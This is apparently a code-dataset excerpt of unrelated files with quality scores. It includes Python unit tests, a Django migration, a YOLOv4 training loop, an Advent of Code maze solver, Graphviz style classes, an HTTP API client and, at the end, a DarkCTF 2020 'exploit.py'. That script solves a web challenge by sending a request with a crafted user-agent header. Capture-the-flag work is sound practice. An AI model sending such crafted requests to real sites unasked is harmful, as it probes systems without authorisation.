return f'Injected function object with string {self._injection_str}'
| 2.75 | 3 |
tests/test_pathutils.py | pombredanne/https-github.com-nexB-tracecode-toolkit | 21 | 12796164 | #
# Copyright (c) nexB Inc. and others. All rights reserved.
# http://nexb.com and https://github.com/nexB/tracecode-toolkit/
# The TraceCode software is licensed under the Apache License version 2.0.
# Data generated with TraceCode require an acknowledgment.
# TraceCode is a trademark of nexB Inc.
#
# You may not use this software except in compliance with the License.
# You may obtain a copy of the License at: http://apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#
# When you publish or redistribute any data created with TraceCode or any TraceCode
# derivative work, you must accompany this data with the following acknowledgment:
#
# Generated with TraceCode and provided on an "AS IS" BASIS, WITHOUT WARRANTIES
# OR CONDITIONS OF ANY KIND, either express or implied. No content created from
# TraceCode should be considered or used as legal advice. Consult an Attorney
# for any legal advice.
# TraceCode is a free and open source software analysis tool from nexB Inc. and others.
# Visit https://github.com/nexB/tracecode-toolkit/ for support and download.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
from tracecode import pathutils
class TestPathUtils(unittest.TestCase):
def test_common_path_prefix1(self):
test = pathutils.common_path_prefix('/a/b/c', '/a/b/c')
assert ('a/b/c', 3) == test
def test_common_path_prefix2(self):
test = pathutils.common_path_prefix('/a/b/c', '/a/b')
assert ('a/b', 2) == test
def test_common_path_prefix3(self):
test = pathutils.common_path_prefix('/a/b', '/a/b/c')
assert ('a/b', 2) == test
def test_common_path_prefix4(self):
test = pathutils.common_path_prefix('/a', '/a')
assert ('a', 1) == test
def test_common_path_prefix_path_root(self):
test = pathutils.common_path_prefix('/a/b/c', '/')
assert (None, 0) == test
def test_common_path_prefix_root_path(self):
test = pathutils.common_path_prefix('/', '/a/b/c')
assert (None, 0) == test
def test_common_path_prefix_root_root(self):
test = pathutils.common_path_prefix('/', '/')
assert (None, 0) == test
def test_common_path_prefix_path_elements_are_similar(self):
test = pathutils.common_path_prefix('/a/b/c', '/a/b/d')
assert ('a/b', 2) == test
def test_common_path_prefix_no_match(self):
test = pathutils.common_path_prefix('/abc/d', '/abe/f')
assert (None, 0) == test
def test_common_path_prefix_ignore_training_slashes(self):
test = pathutils.common_path_prefix('/a/b/c/', '/a/b/c/')
assert ('a/b/c', 3) == test
def test_common_path_prefix8(self):
test = pathutils.common_path_prefix('/a/b/c/', '/a/b')
assert ('a/b', 2) == test
def test_common_path_prefix10(self):
test = pathutils.common_path_prefix('/a/b/c.txt',
'/a/b/b.txt')
assert ('a/b', 2) == test
def test_common_path_prefix11(self):
test = pathutils.common_path_prefix('/a/b/c.txt', '/a/b.txt')
assert ('a', 1) == test
def test_common_path_prefix12(self):
test = pathutils.common_path_prefix('/a/c/e/x.txt',
'/a/d/a.txt')
assert ('a', 1) == test
def test_common_path_prefix13(self):
test = pathutils.common_path_prefix('/a/c/e/x.txt', '/a/d/')
assert ('a', 1) == test
def test_common_path_prefix14(self):
test = pathutils.common_path_prefix('/a/c/e/', '/a/d/')
assert ('a', 1) == test
def test_common_path_prefix15(self):
test = pathutils.common_path_prefix('/a/c/e/', '/a/c/a.txt')
assert ('a/c', 2) == test
def test_common_path_prefix16(self):
test = pathutils.common_path_prefix('/a/c/e/', '/a/c/f/')
assert ('a/c', 2) == test
def test_common_path_prefix17(self):
test = pathutils.common_path_prefix('/a/a.txt', '/a/b.txt/')
assert ('a', 1) == test
def test_common_path_prefix18(self):
test = pathutils.common_path_prefix('/a/c/', '/a/')
assert ('a', 1) == test
def test_common_path_prefix19(self):
test = pathutils.common_path_prefix('/a/c.txt', '/a/')
assert ('a', 1) == test
def test_common_path_prefix20(self):
test = pathutils.common_path_prefix('/a/c/', '/a/d/')
assert ('a', 1) == test
def test_common_path_suffix(self):
test = pathutils.common_path_suffix('/a/b/c', '/a/b/c')
assert ('a/b/c', 3) == test
def test_common_path_suffix_absolute_relative(self):
test = pathutils.common_path_suffix('a/b/c', '/a/b/c')
assert ('a/b/c', 3) == test
def test_common_path_suffix_find_subpath(self):
test = pathutils.common_path_suffix('/z/b/c', '/a/b/c')
assert ('b/c', 2) == test
def test_common_path_suffix_handles_relative_path(self):
test = pathutils.common_path_suffix('a/b', 'a/b')
assert ('a/b', 2) == test
def test_common_path_suffix_handles_relative_subpath(self):
test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c',
'a//a/d//b/c')
assert ('b/c', 2) == test
def test_common_path_suffix_ignore_and_strip_trailing_slash(self):
test = pathutils.common_path_suffix('zsds/adsds/a/b/b/c/',
'a//a/d//b/c/')
assert ('b/c', 2) == test
def test_common_path_suffix_return_None_if_no_common_suffix(self):
test = pathutils.common_path_suffix('/a/b/c', '/')
assert (None, 0) == test
def test_common_path_suffix_return_None_if_no_common_suffix2(self):
test = pathutils.common_path_suffix('/', '/a/b/c')
assert (None, 0) == test
def test_common_path_suffix_match_only_whole_segments(self):
# only segments are honored, commonality within segment is ignored
test = pathutils.common_path_suffix(
'this/is/aaaa/great/path', 'this/is/aaaaa/great/path')
assert ('great/path', 2) == test
def test_common_path_suffix_two_root(self):
test = pathutils.common_path_suffix('/', '/')
assert (None, 0) == test
def test_common_path_suffix_empty_root(self):
test = pathutils.common_path_suffix('', '/')
assert (None, 0) == test
def test_common_path_suffix_root_empty(self):
test = pathutils.common_path_suffix('/', '')
assert (None, 0) == test
def test_common_path_suffix_empty_empty(self):
test = pathutils.common_path_suffix('', '')
assert (None, 0) == test
| 1.375 | 1 |
django_learning/dim_sum/migrations/0002_dimsum_history.py | angelptli/django-learning | 0 | 12796165 | # Generated by Django 3.2.8 on 2021-10-24 01:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dim_sum', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='dimsum',
name='history',
field=models.TextField(default='Write summary here.'),
),
]
| 1.671875 | 2 |
tests/unit/api/models/test_subscriptions.py | kikkomep/life_monitor | 5 | 12796166 |
# Copyright (c) 2020-2021 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
from lifemonitor.auth.models import Subscription, User
from tests import utils
logger = logging.getLogger()
def test_workflow_subscription(user1: dict, valid_workflow: str):
_, workflow = utils.pick_and_register_workflow(user1, valid_workflow)
user: User = user1['user']
s: Subscription = user.subscribe(workflow)
logger.debug("Subscription: %r", s)
assert s, "Subscription should not be empty"
assert len(user.subscriptions) == 1, "Unexpected number of subscriptions"
s: Subscription = user.unsubscribe(workflow)
logger.debug("Subscription: %r", s)
assert s, "Subscription should not be empty"
assert len(user.subscriptions) == 0, "Unexpected number of subscriptions"
| 2.046875 | 2 |
src/yolo4/BaseModel.py | xiao9616/yolo4_tensorflow2 | 212 | 12796167 | # =============================================
# -*- coding: utf-8 -*-
# @Time : 2020/5/14 上午10:50
# @Author : xiao9616
# @Email : <EMAIL>
# @File : BaseModel.py
# @Software: PyCharm
# ============================================
import logging
import tensorflow as tf
import os
from src.yolo4.config import *
from src.yolo4.util import *
from src.yolo4.Net import YOLO4_NET
from src.yolo4.Loss import YOLO4_LOSS
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S', filename="./yolo4/logs/train.log", filemode='w+')
class BaseModel(object):
'''
一个自定义的类,需要重写方法:
'''
def data_generator(self):
'''
Returns:该方法可以重写, 并且返回一个tf.data对象
'''
txt_data = tf.data.TextLineDataset(filenames=train_path)
count = 0
for _ in txt_data:
count += 1
train_data = txt_data.batch(batch_size=batch_size)
return train_data, count
def net_generator(self):
net = YOLO4_NET()
return net
def loss_generator(self):
loss = YOLO4_LOSS()
return loss
def optimizer_generator(self):
lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
initial_learning_rate=0.001,
decay_steps=3000,
decay_rate=0.96,
staircase=True
)
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)
return optimizer
def metric_generator(self):
metric = tf.keras.metrics.Mean()
return metric
def train(self):
# GPU 设置
tf.debugging.set_log_device_placement(True)
if use_gpu:
gpus = tf.config.experimental.list_physical_devices(device_type="GPU")
if gpus:
logging.info("use gpu device")
# gpu显存分配
for gpu in gpus:
tf.config.experimental.set_memory_growth(device=gpu, enable=True)
tf.print(gpu)
else:
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
logging.info("not found gpu device,convert to use cpu")
else:
logging.info("use cpu device")
# 禁用gpu
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
# 训练数据
train_dataset, train_count = self.data_generator()
# 网络结构
net = self.net_generator()
net.summary()
global fine_tune_epoch
# 是否finetune
if fine_tune:
net.load_weights(filepath=weights_path + "epoch-{}".format(fine_tune_epoch))
print("load {} epoch weigth".format(fine_tune))
else:
fine_tune_epoch = -1
print("train model from init")
# 设置loss损失函数
loss = self.loss_generator()
# 设置优化器optimizer
optimizer = self.optimizer_generator()
# 设置评价指标
metric = self.metric_generator()
# 模型训练与更新
for epoch in range(fine_tune_epoch + 1, train_epochs):
step = 0
for train_dataset_batch in train_dataset:
# print(train_dataset_batch)
step += 1
images, boxes = parse_dataset_batch(dataset=train_dataset_batch)
image_batch = process_image_batch(images)
label_batch = generate_label_batch(boxes)
with tf.GradientTape() as tape:
out = net(image_batch)
total_loss = loss(y_true=label_batch, y_pred=out)
gradients = tape.gradient(total_loss, net.trainable_variables)
optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables))
metric.updates(values=total_loss)
print("Epoch: {}/{}, step: {}/{} ,loss: {:.5f}".format(
epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result()
))
metric.reset_states()
if epoch % save_frequency == 0:
net.save_weights(filepath=weights_path + "epoch-{}".format(epoch), save_format='tf')
net.save_weights(filepath=weights_path + "epoch-{}".format(train_epochs), save_format='tf')
if __name__ == '__main__':
yolo = BaseModel()
yolo.train()
| 2.34375 | 2 |
2019/20/day20.py | mfep/advent-of-code-2020 | 2 | 12796168 | import networkx as nx
import sys
from collections import defaultdict
sys.setrecursionlimit(100000000)
def direct_paths(lines):
world = nx.Graph()
for row,line in enumerate(lines):
for col,obj in enumerate(line):
if obj != '.':
continue
if line[col - 1] == '.':
world.add_edge((col, row), (col - 1, row))
if lines[row - 1][col] == '.':
world.add_edge((col, row), (col, row - 1))
return world
def search_portals(lines):
portals = defaultdict(list)
for row,line in enumerate(lines[:-1]):
for col,obj in enumerate(line):
if not obj.isalpha():
continue
if line[col + 1].isalpha():
portals[obj + line[col + 1]].append((col + 2, row) if line[col + 2] == '.' else (col - 1, row))
elif lines[row + 1][col].isalpha():
portals[obj + lines[row + 1][col]].append((col, row - 1) if lines[row - 1][col] == '.' else (col, row + 2))
return portals
def portal_paths(portal_list, world):
for portals in portal_list.values():
if len(portals) == 1:
continue
assert len(portals) == 2
world.add_edge(portals[0], portals[1])
with open('day20.txt') as f:
lines = f.readlines()
width = len(lines[0])
height = len(lines)
W = direct_paths(lines)
portal_connections = search_portals(lines)
portal_paths(portal_connections, W)
path = nx.dijkstra_path(W, portal_connections['AA'][0], portal_connections['ZZ'][0])
print('part one', len(path) - 1)
def is_outer(x, y):
return x == 2 or y == 2 or x == width - 4 or y == height - 3
def accessible_portals(pos, portal_list, world):
acc_outer, acc_inner = {}, {}
for portal_id in portal_list.keys():
if portal_id == 'AA':
continue
for portal_pos in portal_list[portal_id]:
if portal_pos == pos:
continue
try:
dst = nx.dijkstra_path_length(world, pos, portal_pos)
accessible = acc_outer if is_outer(*portal_pos) else acc_inner
assert portal_id not in accessible
accessible[portal_id] = dst, portal_pos
except nx.NetworkXNoPath:
pass
return acc_outer, acc_inner
def get_other_exit(portal_list, portal_id, current_pos):
return [pos for pos in portal_list[portal_id] if pos != current_pos][0]
def pathfind_recursive(pos, level, portal_list, world, history):
print(level)
def search_paths(accessible, dlevel):
paths = []
for pid, dst_pos in accessible.items():
if pid == 'ZZ' or (pid, dst_pos[1], level) in history:
continue
distance_to_goal = pathfind_recursive(get_other_exit(portal_list, pid, dst_pos[1]), level + dlevel, portal_list, world, history.union([(pid, dst_pos[1], level)]))
paths.append(distance_to_goal + dst_pos[0] + 1 if distance_to_goal else None)
paths = [path for path in paths if path]
return min(paths) if paths else None
acc_outer, acc_inner = accessible_portals(pos, portal_list, world)
if level == 0 and 'ZZ' in acc_outer:
return acc_outer['ZZ'][0]
if level != 0 and acc_outer:
outer_found = search_paths(acc_outer, -1)
if outer_found:
return outer_found
return search_paths(acc_inner, 1)
def pathfind_loop(world, portal_list, max_level):
def add_branches(accessible, new_level, current_length):
for pid in [pid for pid in accessible.keys() if pid != 'ZZ']:
current = accessible[pid]
new_length = current_length + 1 + current[0]
new_pos = get_other_exit(portal_list, pid, current[1])
to_check_branch.append((new_pos, new_level, new_length))
to_check_branch = [(portal_list['AA'][0], 0, 0)]
solutions = []
while to_check_branch:
pos, level, path_length = to_check_branch.pop()
acc_outer, acc_inner = accessible_portals(pos, portal_list, world)
if level == 0 and 'ZZ' in acc_outer:
solutions.append(path_length + acc_outer['ZZ'][0])
print(solutions[-1])
elif level >= max_level:
continue
add_branches(acc_inner, level + 1, path_length)
if level > 0 and acc_outer:
add_branches(acc_outer, level - 1, path_length)
return min(solutions) if solutions else None
W = direct_paths(lines)
#result = pathfind_recursive(portal_connections['AA'][0], 0, portal_connections, W, set())
result = pathfind_loop(W, portal_connections, 100)
print('part two', result) | 2.828125 | 3 |
rp2paths/DotStyle.py | brsynth/RP2paths | 13 | 12796169 | <filename>rp2paths/DotStyle.py
"""Class for setting the appearance of a dot file.
Copyright (C) 2016-2017 <NAME>, JL Faulon's research group, INRA
Use of this source code is governed by the MIT license that can be found in the
LICENSE.txt file.
"""
class NodeStyle(object):
"""General class for node style."""
def __init__(self, **kwargs):
"""Initialize."""
self.style = dict()
for key, value in kwargs:
self.style.extend(key, value)
def GetStyle(self):
"""Return a dictionnary of key, value of .dot attributes."""
return self.style
class Chassis(NodeStyle):
"""Style for a chassis compound node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style.update({
'shape': 'rectangle',
'fontcolor': 'green',
'color': 'green',
'fontsize': '18',
'penwidth': '0'
})
class Intermediate(NodeStyle):
"""Style for an intermediate compound node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'shape': 'rectangle',
'fontsize': '18',
'penwidth': '0'
}
class Target(NodeStyle):
"""Style for a target compound node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'shape': 'rectangle',
'color': 'red',
'fontsize': '18',
'penwidth': '1'
}
class Reaction(NodeStyle):
"""Style for a reaction node."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'shape': 'oval',
'fontsize': '24'
}
class EdgeStyle(object):
"""General class for edge style."""
def __init__(self, **kwargs):
"""Initialize."""
self.style = dict()
for key, value in kwargs:
self.style.extend(key, value)
def GetStyle(self):
"""Return a dictionnary of key, value of .dot attributes."""
return self.style
class Consumption(EdgeStyle):
"""Style for a consumption edge."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'color': 'green',
'penwidth': '2',
'arrowsize': '2'
}
class Production(EdgeStyle):
"""Style for a production edge."""
def __init__(self, **kwargs):
"""Initialize."""
super().__init__(**kwargs)
self.style = {
'color': 'red',
'penwidth': '2',
'arrowsize': '2'
}
| 2.921875 | 3 |
mandala/tests/test_deletion.py | amakelov/mandala | 9 | 12796170 | <reponame>amakelov/mandala<filename>mandala/tests/test_deletion.py
from .utils import *
from .funcs import *
from .conftest import setup_tests
def test_simple(setup_tests):
storage, cts = setup_tests
storage:Storage
############################################################################
### unit
############################################################################
### do some work
with run(storage=storage) as c:
x = add(23, 42)
c.commit()
### delete the work
with delete(storage=storage) as c:
x = add(23, 42)
c.commit_deletions()
### check if things got deleted
df = storage.rel_adapter.get_op_vrefs(op=add.op, rename=True)
assert df.empty
assert not storage.call_st.locs()
### do computation again
with run(storage=storage) as c:
x = add(23, 42)
c.commit()
with query(storage=storage) as c:
x, y = Any(), Any()
z = add(x, y)
df = c.qeval(x, y, z, names=['x', 'y', 'z'])
assert {tuple(elt) for elt
in df.itertuples(index=False)} == {(23, 42, 65)}
storage.drop_instance_data(answer=True)
############################################################################
### deleting multiple calls at once
############################################################################
with run(storage=storage) as c:
things = []
means = []
for i in range(10):
thing = inc(i)
things.append(thing)
for j in range(10):
things.append(add(thing, j))
cur_mean = mean(things)
means.append(cur_mean)
final = mean(means)
c.commit()
with delete(storage=storage) as c:
things = []
means = []
for i in range(10):
thing = inc(i)
things.append(thing)
for j in range(10):
things.append(add(thing, j))
cur_mean = mean(things)
means.append(cur_mean)
final = mean(means)
c.commit_deletions()
for func in (inc, add, mean):
df = storage.rel_adapter.get_op_vrefs(op=func.op, rename=True)
assert df.empty
assert not storage.call_st.locs()
storage.drop_instance_data(answer=True)
############################################################################
### deleting some things only
############################################################################
# run a workflow of several parts
with run(storage=storage) as c:
nums = range(10)
incs = [inc(x) for x in nums]
final = mean(x=incs)
c.commit()
# delete only latter part
with run(storage=storage) as c:
nums = range(10)
incs = [inc(x) for x in nums]
with c(mode=MODES.delete) as d:
final = mean(x=incs)
d.commit_deletions()
# check it got deleted but earlier things didn't
df = storage.rel_adapter.get_op_vrefs(op=mean.op, rename=True)
assert df.empty
df = storage.rel_adapter.get_op_vrefs(op=inc.op, rename=True)
assert df.shape[0] == 10
storage.call_st.locs()
storage.drop_instance_data(answer=True)
############################################################################
### deleting calls only, verifying vrefs remain orphaned
############################################################################
with run(storage) as c:
nums = range(10)
incs = [inc(x) for x in nums]
final = mean(x=incs)
c.commit()
inc_locs = [storage.where_is(vref=x) for x in incs]
assert not any(storage.rel_adapter.mis_orphan(locs=inc_locs))
final_loc = storage.where_is(vref=final)
assert not storage.rel_adapter.mis_orphan(locs=[final_loc])[0]
with delete(storage, autodelete=False) as c:
nums = range(10)
incs = [inc(x) for x in nums]
final = mean(x=incs)
c.commit_deletions()
assert all(storage.rel_adapter.mis_orphan(locs=inc_locs))
assert storage.rel_adapter.mis_orphan(locs=[final_loc])[0]
storage.drop_instance_data(answer=True)
############################################################################
### deleting with a superop
############################################################################
with run(storage, autocommit=True):
add_three(x=23, y=42, z=5)
with delete(storage, autodelete=True):
add_three(x=23, y=42, z=5)
assert not storage.call_st.locs()
storage.drop_instance_data(answer=True)
def test_superops():
storage = Storage()
@op(storage)
def get_divisors(num:int) -> TList[int]:
return [x for x in range(1, num) if num % x == 0]
@superop(storage)
def concat_divisors(nums:TList[int]) -> TList[int]:
divisors_list = [get_divisors(num) for num in nums]
return [elt for divs in divisors_list for elt in divs]
@op(storage)
def inc(x:int) -> int:
return x + 1
@superop(storage)
def inc_by_chunk(chunk:TList[int]) -> TList[int]:
return [inc(x) for x in chunk]
with run(storage, autocommit=True):
nums = list(range(20))
concat_divisors(nums=nums)
with delete(storage, autodelete=True):
nums = list(range(20))
concat_divisors(nums=nums)
assert len(storage.call_st.locs()) == 0
def test_bug():
storage = Storage()
@op(storage)
def get_divisors(num:int) -> TList[int]:
return [x for x in range(1, num) if num % x == 0]
@superop(storage)
def f(lst:TList[int]) -> int:
return lst[0]
with run(storage, autocommit=True):
lst = get_divisors(100)
f(lst)
with run(storage):
lst = get_divisors(100)
with delete(autodelete=True):
f(lst)
assert f.get_table().empty
storage.drop_instance_data(answer=True)
def test_drop_op():
"""
Tests for deleting operations are isolated to prevent schema changes across tests
"""
storage = Storage()
@op(storage)
def inc(x:int) -> int:
return x + 1
@op(storage)
def add(x:int, y:int) -> int:
return x + y
### drop empty op
storage.drop_func(f=add)
assert not storage.op_adapter.has_op(ui_name='add', version='0')
with run(storage, autocommit=True):
for i in range(10):
inc(i)
### drop op with results
storage.drop_func(f=inc)
assert not storage.op_adapter.has_op(ui_name='inc', version='0')
# cleanup
storage.drop_instance_data(answer=True)
def test_drop_uncommitted(setup_tests):
storage, cts = setup_tests
storage:Storage
### unit
with run(storage, autocommit=False):
for i in range(10):
inc(i)
assert len(storage.call_st.locs()) == 10
storage.drop_uncommitted_calls()
assert len(storage.call_st.locs()) == 0
storage.drop_instance_data(answer=True)
### after committed work
with run(storage, autocommit=False) as c:
for i in range(10):
inc(i)
c.commit()
with run(storage, autocommit=False) as c:
for i in range(10, 20):
inc(i)
assert len(storage.call_st.locs()) == 20
storage.drop_uncommitted_calls()
assert len(storage.call_st.locs()) == 10
storage.drop_instance_data(answer=True)
### test isolation of commits between partitions
with run(storage, autocommit=False, partition='first') as c:
for i in range(10):
inc(i)
c.commit()
with run(storage, autocommit=False, partition='second') as c:
for i in range(10, 20):
inc(i)
with run(storage, autocommit=False, partition='third') as c:
for i in range(20, 30):
inc(i)
c.commit()
assert len(storage.call_st.locs()) == 30
storage.drop_uncommitted_calls()
assert len(storage.call_st.locs()) == 20
storage.drop_instance_data(answer=True) | 2.171875 | 2 |
ist-study-table-roc.py | lhwangbo/m-ist | 0 | 12796171 | import time
import matplotlib.pyplot as plt
from joblib import dump, load
from sklearn.model_selection import *
# A custom-made library for reporting
from my_eval_functions import set_seeds, get_clf_eval, dingdong, printtimer
# Written by <NAME>, MD. Dec 2021.
##### BEGIN
print('Loading dataframe, base, and ensemble classifiers')
start_time = printtimer(time.time())
set_seeds(123)
# READS DF
df_final = load('df_final.joblib')
df = df_final[0]
df_label = df_final[1]
df_train, df_test, df_train_label, df_test_label = train_test_split (df, df_label, test_size=0.3, random_state=123)
# READS INDIVIDUAL BASE MODELS (Lv 0)
clflist = load('MortalityOutcomeModels.joblib')
clfnamelist = load('ClassifierNameList.joblib')
# READS STACKING ENSEMBLE MODEL (Lv 1)
ensemble_model = load('EnsembleModel.joblib')
### TO STDOUT
print('*****************************************************************************************')
print(' TRAINING SET\n')
print('=========================================================================================')
for i in range (0,len(clflist)):
print('\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i])
get_clf_eval(df_train_label.tolist(), clflist[i].best_estimator_.predict_proba(df_train)[:, 1].tolist())
printtimer(start_time)
print('********** Ensemble [KNN + XGB + SVM + NB + RF + ANN + LR] ******************************')
print('*****************************************************************************************\n\n')
get_clf_eval(df_train_label.tolist(), ensemble_model.predict_proba(df_train)[:,1].tolist())
################# VALIDATION #################
print('*****************************************************************************************')
print(' VALIDATION SET\n')
print('=========================================================================================')
for i in range (0,len(clflist)):
print('\n***** INDIVIDUAL MODEL (best): ', clfnamelist[i])
get_clf_eval(df_test_label.tolist(), clflist[i].best_estimator_.predict_proba(df_test)[:, 1].tolist())
printtimer(start_time)
print('=========================================================================================')
print('********** Ensemble [KNN + XGB + SVM + NB + RF + ANN + LR] ******************************')
print('*****************************************************************************************\n\n')
get_clf_eval(df_test_label.tolist(), ensemble_model.predict_proba(df_test)[:,1].tolist())
printtimer(start_time)
dingdong()
| 2.65625 | 3 |
src/utils.py | qbasista/api-scraper | 0 | 12796172 | <filename>src/utils.py
from typing import Dict
def add_prefix_to_keys(data: Dict, prefix: str) -> Dict:
keys = [*data.keys()]
for key in keys:
data[f"{prefix}_{key}"] = data.pop(key)
return data
| 2.765625 | 3 |
unit_tests/LLC1/test_create_llc1.py | LandRegistry/maintain-frontend | 1 | 12796173 | <filename>unit_tests/LLC1/test_create_llc1.py<gh_stars>1-10
from flask_testing import TestCase
from unit_tests.utilities import Utilities
from maintain_frontend import main
from maintain_frontend.dependencies.session_api.session import Session
from maintain_frontend.constants.permissions import Permissions
from flask import url_for
class TestCreateLLC1(TestCase):
def create_app(self):
main.app.testing = True
Utilities.mock_session_cookie_flask_test(self)
return main.app
def test_create_llc1(self):
self.client.set_cookie('localhost', Session.session_cookie_name, 'cookie_value')
self.mock_session.return_value.user.permissions = [Permissions.request_llc1]
response = self.client.get(url_for("create_llc1.create_llc1"))
self.assert_status(response, 302)
self.assertRedirects(response, url_for("create_llc1.llc1_get_location"))
self.mock_session.return_value.commit.assert_called()
| 2.390625 | 2 |
ex022.py | LucasIdalino/Exerc-cios-do-Curso | 0 | 12796174 | <gh_stars>0
#Valor da variável sem espaços no ínicio e fim.
nome = str(input("Seu nome: ")).strip()
#Valor da variável em letras maiúscula.
print("Maiúscula:", nome.upper(), "\033[1;32m<--\033[m")
#Valor da variável em letras minúsculas.
print("Minúscula:", nome.lower(), "\033[1;32m<--\033[m")
#Contando quantas letras tem o valor da várialvel nome sem espaços.
print("Meu nome tem:", len(nome)-nome.count(" "), "\033[1;32m<--\033[m")
# print("Meu primeiro nome tem:", nome.find(" "))
# print("Seu primeiro tem {} letras".format(nome.find(" ")))
separa = nome.split()
print("Meu primeiro nome tem:", len(separa[0]), "\033[1;32m<--\033[m")
| 3.9375 | 4 |
client.py | bollacker/lri-b | 0 | 12796175 | <filename>client.py
#!/usr/bin/env python
# Copyright 2012-2013 inBloom, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json,sys,httplib2,urllib,yaml,traceback,copy,base64,zlib
def parse_cursor(s):
return(json.loads(zlib.decompress(base64.urlsafe_b64decode(s.encode('utf-8')))))
class client(object):
def __init__(self,host='127.0.0.0',port=8000,verbose=False):
self.headers={}
self.host=host
self.port=port
self.verbose=verbose
self.errors = []
self.connect()
def connect(self):
try:
self.conn=httplib2.Http()
except:
self.errors.append("Failed to connect to server at host %s port %s." % (self.host,self.port))
if self.verbose:
print self.errors[-1]
#def query(self,httpmode,command,q,opts,parse=True):
def query(self, *args, **kwargs):
if not kwargs:
parse = True
else:
parse = kwargs['parse']
if len(args) == 4:
httpmode, command, q, opts = args[0:4]
elif len(args) == 3:
httpmode, command, q, opts = 'GET', args[0], args[1], args[2]
uq=urllib.urlencode({"q":json.dumps(q)})
uopts=urllib.urlencode({"opts":json.dumps(opts)})
if httpmode == 'GET':
url='http://'+self.host+':'+str(self.port)+'/'+command+'?'+uq+'&'+uopts
resp,cont=self.conn.request(url,method='GET',headers=self.headers)
elif httpmode == 'POST':
url='http://'+self.host+':'+str(self.port)+'/'+command
resp,cont=self.conn.request(url,method='POST',headers=self.headers,body='?'+uq+'&'+uopts)
else:
print "BAD HTTP MODE:",httpmode
return None
if self.verbose:
print "REQUEST URL =",url
if resp.status==200:
if not parse:
return cont
if not opts.has_key("format") or opts["format"] == "json":
j=json.loads(cont)
return j
elif opts.has_key("format"):
if opts["format"] == "yaml":
return yaml.safe_load(cont)
elif opts["format"] in ["xml","oldxml","johnxml"]:
return cont
else:
print resp,cont
return None
def search_iter(self,q,opts={},pagesize=10):
opts['format'] = 'json'
lq = copy.deepcopy(q)
lq['limit'] = pagesize
r = self.query('POST','entity/search',lq,opts)
hits = []
if r.get('response'):
hits.extend(r['response'])
find_dupes(hits)
while r.get('cursor'):
#print "ITER CURSOR:",r['cursor'][0:60]
#print "DECODED CURSOR:",json.dumps(parse_cursor(r['cursor']),indent=4,sort_keys=True)
lq = {"cursor":r['cursor'],"limit":pagesize}
r = self.query('POST','entity/search',lq,opts)
if r.get('response'):
hits.extend(r['response'])
print "TOTAL HITS:",len(hits)
find_dupes(hits)
return hits
def find_dupes(l):
h = set()
for hit in l:
i = hit['props']['urn:lri:property_type:guid']
if i in h:
print "DUPLICATE! ",i
h.add(i)
#print "TOTAL SET:",json.dumps(sorted(list(h)),indent=4)
if __name__=='__main__':
h,p = sys.argv[1].split(":")
c=client(host=h,port=int(p))
q = json.loads(sys.argv[2])
print "QUERY:\n",json.dumps(q,indent=4,sort_keys=True)
if len(sys.argv) > 3:
pagesize = sys.argv[3]
else:
pagesize,pagesize = 10
response = c.search_iter(q,pagesize=pagesize)
print json.dumps(response,indent=4,sort_keys=True)
"""
Usage examples:\n
./client.py GET entity/search '{"urn:lri:property_type:types":"urn:lri:entity_type:type"}' '{"details":true}'
./client.py GET entity/create '{"urn:lri:property_type:id":"MY_FQGUID","urn:lri:property_type:types":["urn:lri:entity_type:thing"]}'
./client.py GET property/create '{"from":"MY_ENTITY_GUID","urn:lri:property_type:name":"THE NAME OF MY ENTITY"}'
./client.py GET property/update '{"guid":"MY_PROPERTY_GUID","value":"MY NEW NAME"}'
"""
| 2.5 | 2 |
DarkCTF 2020/Web/Source/exploit.py | UnknownAbyss/CTF-Write-ups | 73 | 12796176 | import requests
url = 'http://source.darkarmy.xyz/'
r = requests.get(url, headers={
'user-agent': '9e9',
})
